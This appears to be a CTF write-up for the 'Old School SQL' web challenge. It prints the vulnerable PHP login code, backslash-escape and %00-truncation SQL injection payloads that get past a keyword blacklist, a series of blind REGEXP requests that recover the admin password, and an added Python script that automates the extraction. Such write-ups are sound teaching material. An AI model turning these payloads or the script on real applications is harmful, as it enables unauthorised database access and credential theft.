Tags: sqli web
Rating: 4.7
# ▼▼▼Old School SQL(Web:150)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
```
Being the admin is great
Link(http://35.200.215.237/)
```
---
## 【view source code】
`http://35.200.215.237/`
↓
Requesting the page with empty parameters prints the query it ran and, through `highlight_file(__FILE__)`, the PHP itself. The capture below starts partway through the `$black_list` regex, so only the tail of the filter is visible.
```
query : select user from chal where user='' and pw=''
|-|chal|_|\.|\(\)|#|and|if|database|where|concat|insert|having|sleep/i";
if(preg_match($black_list, $_GET['user'])) exit(":P");
if(preg_match($black_list, $_GET['pw'])) exit(":P");
$query="select user from chal where user='$_GET[user]' and pw='$_GET[pw]'";
$result = mysql_query($query);
$result = mysql_fetch_array($result);
$admin_pass = mysql_fetch_array(mysql_query("select pw from chal where user='admin'"));
echo "<h1>query : {$query}
</h1>";
if($result['user']) echo "<h2>Welcome {$result['user']}</h2>";
if(($admin_pass['pw'])&&($admin_pass['pw'] === $_GET['pw'])){
echo $flag;
}
highlight_file(__FILE__);
?>
```
---
## 【exploit】
Three properties of the source decide the attack. `$_GET['user']` and `$_GET['pw']` are pasted straight into the query, so a `user` value of a single backslash escapes the quote that was meant to close `user='...'`; the text `' and pw='` then becomes part of that string literal and whatever follows in `pw` is parsed as SQL. `mysql_query()` takes a C string, so a `%00` byte at the end of `pw` truncates the query there and the closing `'` that PHP appends never reaches MySQL. Finally, the flag is printed only when `$_GET['pw']` is strictly equal (`===`) to the stored admin password, so getting `Welcome admin` is not the goal: the password itself has to be recovered. Every request still has to pass `$black_list`, whose visible part rejects `-`, `chal`, `_`, `.`, `()`, `#`, `and`, `if`, `database`, `where`, `concat`, `insert`, `having` and `sleep`, case-insensitively. The payloads therefore use `/**/` as whitespace, `||` (which MySQL reads as `OR` unless `PIPES_AS_CONCAT` is set), double-quoted string literals and `REGEXP` for the comparison.
GET /?user=`\`&pw=`||user/**/REGEXP/**/%22admi%22||%22n%22;%00`
↓
Welcome admin

The query MySQL actually executes is `select user from chal where user='\' and pw='||user/**/REGEXP/**/"admi"||"n";` (everything after the `%00` is dropped). The literal `'\' and pw='` equals no username, so rows can only come from the `||` branch. `REGEXP` binds tighter than `||`, so `user REGEXP "admi"||"n"` is evaluated as `(user REGEXP "admi") OR "n"`, and `"n"` casts to 0. The first row whose user contains `admi` is admin, which confirms both that the injection works and that the account exists, and the request never contains the string `admin` contiguously.
---
GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^1%22;%00` ⇒Welcome admin
GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^17%22;%00` ⇒Welcome admin
GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^172%22;%00` ⇒Welcome admin
GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^1729%22;%00` ⇒Welcome admin
GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^17292%22;%00` ⇒Welcome admin
GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^172921%22;%00` ⇒Welcome admin
GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^1729211%22;%00` ⇒Welcome admin
GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^17292115%22;%00` ⇒Welcome admin
↓
admin's password is `17292115`

Each request above swaps the `user` test for `pw REGEXP "^<prefix>"`. When the prefix is right, the first row that matches is admin's and the page prints `Welcome admin`; when it is wrong, the greeting is missing (or names some other user whose password happens to match). Growing the prefix one character at a time turns that greeting into a one-bit oracle and recovers the password from left to right; the writeup stops after eight digits and lets the final login confirm that nothing follows them. Two caveats apply in general: a character that completes a blacklisted word (`if`, `and`, ...) is answered with `:P` instead of a yes/no, and `REGEXP` is case-insensitive on non-binary columns, so letters would need a `BINARY` cast to be told apart. Neither matters for an all-digit password, but the `===` check in the flag branch is why the exact value is required.
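The manual requests above can be automated. The script below is an added example and not the writeup author's code: it builds the same `pw` payload, drives the `Welcome admin` oracle character by character, closes the pattern with `$` to detect the end of the password, and falls back to a bracketed atom (`[d]`) when a candidate character would complete a blacklisted word such as `and`. The challenge host is the one on the page; `gu3st`, `band1t` and the table rows in the simulated oracle are constructed so the script runs offline, and the simulation only knows the part of the blacklist that is visible above. It goes beyond the page's payload in handling filter hits and letters.

```python
"""Blind extraction of admin's password through the `Welcome admin` oracle.

Added example, not the writeup author's code. TARGET is the challenge host from the
page; the rows used by the simulated oracle are constructed for offline use.
"""
import re
import string
from urllib.parse import quote
from urllib.request import urlopen

TARGET = "http://35.200.215.237"        # challenge host from the page
SUCCESS_MARKER = "Welcome admin"        # printed when the first row returned is admin's
FILTER_MARKER = ":P"                    # the PHP exits with exactly this when $black_list fires
# Digits and lowercase letters only: `_`, `-`, `.` and `#` are on the visible blacklist, and
# MySQL REGEXP is case-insensitive on non-binary columns, so letter case cannot be recovered.
ALPHABET = string.digits + string.ascii_lowercase


class FilterHit(Exception):
    """The blacklist rejected the request (the page answered ':P')."""


def pw_payload(regex_body):
    """Value of the `pw` parameter for the pattern `^<regex_body>`.

    With user=\\ the quote closing user='' is escaped, so `pw` lands in SQL context:
      ... where user='\\' and pw='||pw/**/REGEXP/**/"^1";<NUL>'
    `||` is OR in MySQL's default sql_mode, `/**/` stands in for whitespace, and the NUL
    byte makes the strlen-based mysql_query() drop the `'` that PHP appends after $_GET[pw].
    """
    return '||pw/**/REGEXP/**/"^' + regex_body + '";\x00'


def build_url(regex_body, base=TARGET):
    """Full request URL; the safe set keeps the payload readable, as in the writeup."""
    return f"{base}/?user=%5C&pw=" + quote(pw_payload(regex_body), safe="|/*^;$[]")


def http_oracle(regex_body):
    """True when the live page greets admin for this pattern; raises FilterHit on ':P'."""
    body = urlopen(build_url(regex_body), timeout=10).read().decode(errors="replace")
    # exit(":P") runs before anything else is printed, so the whole body is ':P'.
    # Do not test `":P" in body`: the highlighted source on a normal page contains it too.
    if body.strip() == FILTER_MARKER:
        raise FilterHit(regex_body)
    return SUCCESS_MARKER in body


def atom(ch, bracket=False):
    """Regex atom matching exactly `ch`. The bracket form `[x]` neutralises metacharacters
    and splits the growing prefix so it never spells a blacklisted word: `ban` + `d` reads
    `band`, which the `and` rule rejects, while `ban[d]` passes."""
    return f"[{ch}]" if bracket or not ch.isalnum() else ch


def extract_password(oracle, alphabet=ALPHABET, max_len=64):
    """Recover the password one character at a time; `$` closes the pattern to confirm the end."""
    found, pattern = "", ""
    while len(found) < max_len:
        for ch in alphabet:
            hit = None
            for candidate in (pattern + atom(ch), pattern + atom(ch, bracket=True)):
                try:
                    hit = oracle(candidate)
                    break
                except FilterHit:
                    continue                      # keyword completed: retry bracketed
            if hit is None:
                raise RuntimeError(f"both forms of {ch!r} are filtered after {found!r}")
            if hit:
                found, pattern = found + ch, candidate
                break
        else:
            raise RuntimeError(f"no character in the alphabet follows {found!r}")
        if oracle(pattern + "$"):                 # ^found$ matches: nothing follows
            return found
    raise RuntimeError(f"password longer than {max_len} characters")


# ---- offline stand-in for the vulnerable page (constructed rows, not the real table) ----
# The visible part of the page's $black_list; its beginning is cut off in the capture.
BLACKLIST = re.compile(
    r"-|chal|_|\.|\(\)|#|and|if|database|where|concat|insert|having|sleep", re.I)


def make_simulated_oracle(rows):
    """Mirror the PHP: filter the parameter, then evaluate the injected WHERE clause.

    `user='\\' and pw='` is a literal that equals no username, so only the REGEXP branch
    selects rows; mysql_fetch_array() yields the first match and the page greets that user.
    """
    def oracle(regex_body):
        if BLACKLIST.search(pw_payload(regex_body)):
            raise FilterHit(regex_body)
        for user, pw in rows:                               # first matching row wins
            if re.match("^" + regex_body, pw, re.I):        # re.I mimics MySQL's REGEXP
                return user == "admin"
        return False
    return oracle


if __name__ == "__main__":
    demo = make_simulated_oracle([("guest", "gu3st"), ("admin", "17292115")])
    print("simulated:", extract_password(demo))             # 17292115
    print("live request would be:", build_url("17292115$"))
    # print("live:", extract_password(http_oracle))         # against the challenge host
```

The oracle only answers "is admin the first row matching this prefix"; a second user whose password shares the prefix and sorts earlier would hide admin's row, which is a limitation of this particular greeting and not of the script. For alphabetic passwords, put `BINARY` before the pattern so `REGEXP` compares case-sensitively.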
---
## 【Enter admin's password】
http://35.200.215.237/?pw=`17292115`
`user` can be left out: the flag branch compares only `$_GET['pw']` against the stored admin password, with `===`, so the recovered value has to match exactly.
↓
`flag{sQ1_inj3c7i0n_i5_v3ry_3asy}`
great job
Thanks !!